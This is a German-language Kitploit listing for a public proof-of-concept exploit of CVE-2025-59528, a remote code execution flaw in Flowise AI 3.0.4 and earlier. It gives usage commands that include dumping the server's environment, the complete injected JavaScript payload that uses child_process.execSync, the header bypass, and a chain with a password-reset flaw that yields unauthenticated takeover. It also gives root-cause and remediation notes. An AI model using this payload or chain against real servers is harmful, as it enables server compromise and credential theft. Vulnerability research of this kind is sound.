Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Flowise-RCE-CVE-2025-59528 — Authenticated Remote Code Execution (RCE) exploit for Flowise AI versions ≤ 3.0.4. Leverages a vulnerability in the /api/v1/node-load-method/customMCP endpoint to execute arbitrary system commands via Node.js child_process.execSync(). Includes full PoC script and remediation steps. | Kitploit
Tools/GitHubGitHub/r3nsi15/flowise-rce-cve-2025-59528
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & EducationPayload Development
GitHubr3nsi15/flowise-rce-cve-2025-59528

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Flowise-RCE-CVE-2025-59528

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Authenticated Remote Code Execution (RCE) exploit for Flowise AI versions ≤ 3.0.4. Leverages a vulnerability in the /api/v1/node-load-method/customMCP endpoint to execute arbitrary system commands via Node.js child_process.execSync(). Includes full PoC script and remediation steps.

Teilen

CVE-2025-59528 — Flowise AI Authentifizierte Remote-Codeausführung (RCE)

Übersicht

CVE-ID: CVE-2025-59528
Betroffene Software: Flowise AI
Anfällige Versionen: <= 3.0.4
Behobene Version: 3.0.5 und später
Schweregrad: Kritisch
Autor: r3nsi15
Datum: 2025

Beschreibung

Flowise AI-Versionen bis einschließlich 3.0.4 ermöglichen es einem authentifizierten Benutzer, Remote-Codeausführung (RCE) auf dem Host-Server zu erreichen, indem er ein manipuliertes JavaScript-Payload an den Endpunkt /api/v1/node-load-method/customMCP sendet.

Die load-Methode des customMCP-Knotens akzeptiert vom Benutzer kontrollierte Eingaben, die serverseitig als JavaScript ausgewertet werden, ohne ausreichende Bereinigung oder Sandboxing. Durch das Injizieren eines Payloads, das Node.js' child_process.execSync nutzt, kann ein Angreifer beliebige Betriebssystembefehle mit den Privilegien des Flowise-Serverprozesses ausführen.

Der Endpunkt erfordert außerdem, dass der Header x-request-from: internal vorhanden ist.

Betroffener Endpunkt

EndpunktMethodeAuthentifizierung erforderlichZweck
/api/v1/auth/loginPOSTNeinAuthentifizierung und Sitzungserhalt

Proof of Concept

Datei: CVE-2025-59528_POC.py

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek
  • Gültige Anmeldedaten für ein beliebiges Benutzerkonto auf der Ziel-Flowise-Instanz
root@kitploit:~
pip install requests

Verwendung

root@kitploit:~
python3 CVE-2025-59528_POC.py -e <email> -i <target_url> -p <password> -c <command>

Argumente

Beispiele

Codeausführung überprüfen:

root@kitploit:~
python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "id"

Umgebungsvariablen des Servers abrufen:

root@kitploit:~
python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "env"

Erwartete Ausgabe

root@kitploit:~
[+] Logged in
[+] Exploit sent
[+] Status: 200

Aufbau des Payloads

Der Exploit injiziert den folgenden JavaScript-Ausdruck in das Feld mcpServerConfig:

root@kitploit:~
({x:(function(){
    const cp = process.mainModule.require('child_process');
    cp.execSync('<command>');
    return 1;
})()})
  • process.mainModule.require('child_process') — lädt Node.js' integriertes Modul zur Prozessausführung.
  • execSync('<command>') — führt den vom Angreifer bereitgestellten Betriebssystembefehl synchron aus.
  • Der gesamte Ausdruck ist in ein Objektliteral eingebettet, um sicherzustellen, dass er innerhalb des JavaScript-Kontexts des Servers sauber ausgewertet wird.

Der Header x-request-from: internal wird ebenfalls an die Anfrage angehängt, um eine interne Herkunftsprüfung zu bestehen, die den Aufruf sonst blockieren würde.

Grundursache

Der Endpunkt customMCP übergibt benutzergesteuerte Eingaben direkt in einen JavaScript-Auswertungskontext auf dem Server, ohne Bereinigung oder Sandboxing. Zusammen mit dem uneingeschränkten Zugriff auf Node.js-Kernmodule (insbesondere child_process) über process.mainModule.require entsteht ein trivial ausnutzbarer RCE-Vektor. Die Überprüfung des Headers x-request-from bietet keine sinnvolle Sicherheitsgrenze, da er nicht gegen eine vertrauenswürdige Quelle validiert wird.

Verkettung mit CVE-2025-58434

Diese beiden Schwachstellen können für einen nicht authentifizierten RCE-Angriffspfad gegen Flowise-Instanzen, die Versionen <= 3.0.4 ausführen, verkettet werden:

  1. Verwenden Sie CVE-2025-58434, um das Passwort eines bekannten Kontos zurückzusetzen (keine vorherige Authentifizierung erforderlich).
  2. Melden Sie sich mit den neu gesetzten Anmeldedaten an.
  3. Verwenden Sie CVE-2025-59528, um beliebige Betriebssystembefehle auf dem Server auszuführen.

Behebung

  • Aktualisieren Sie auf Flowise AI 3.0.5 oder höher, das den anfälligen Auswertungspfad entfernt oder ordnungsgemäß sandboxt.
  • Werten Sie niemals benutzergesteuerte Zeichenketten als Code in einem serverseitigen Kontext aus.
  • Beschränken Sie den Zugriff auf gefährliche Node.js-Module (child_process, fs, usw.) durch eine ordnungsgemäße Sandbox (z. B. vm2, isolierte Kontexte oder Entfernen des Zugriffs auf process.mainModule).
  • Validieren und authentifizieren Sie den Header x-request-from über einen serverseitigen Mechanismus anstelle einer einfachen Zeichenkettenprüfung.
  • Wenden Sie das Prinzip der geringsten Privilegien auf den Flowise-Serverprozess an.

Haftungsausschluss

Dieses Proof of Concept wird ausschließlich für pädagogische und autorisierte Sicherheitsforschungszwecke bereitgestellt. Die Verwendung dieses Skripts gegen Systeme ohne ausdrückliche schriftliche Genehmigung ist illegal und unethisch. Der Autor und die Mitwirkenden übernehmen keine Haftung für Missbrauch.

Tool herunterladen
/api/v1/node-load-method/customMCP
POST
Ja (Sitzungscookie)
Anfälliger node-load-method-Endpunkt
FlaggeLangformErforderlichBeschreibung
-e--emailJaE-Mail-Adresse des authentifizierten Benutzers
-i--urlJaBasis-URL der Flowise-Instanz
-p--passwordJaPasswort des authentifizierten Benutzers
-c--cmdJaAuf dem Server auszuführender Betriebssystembefehl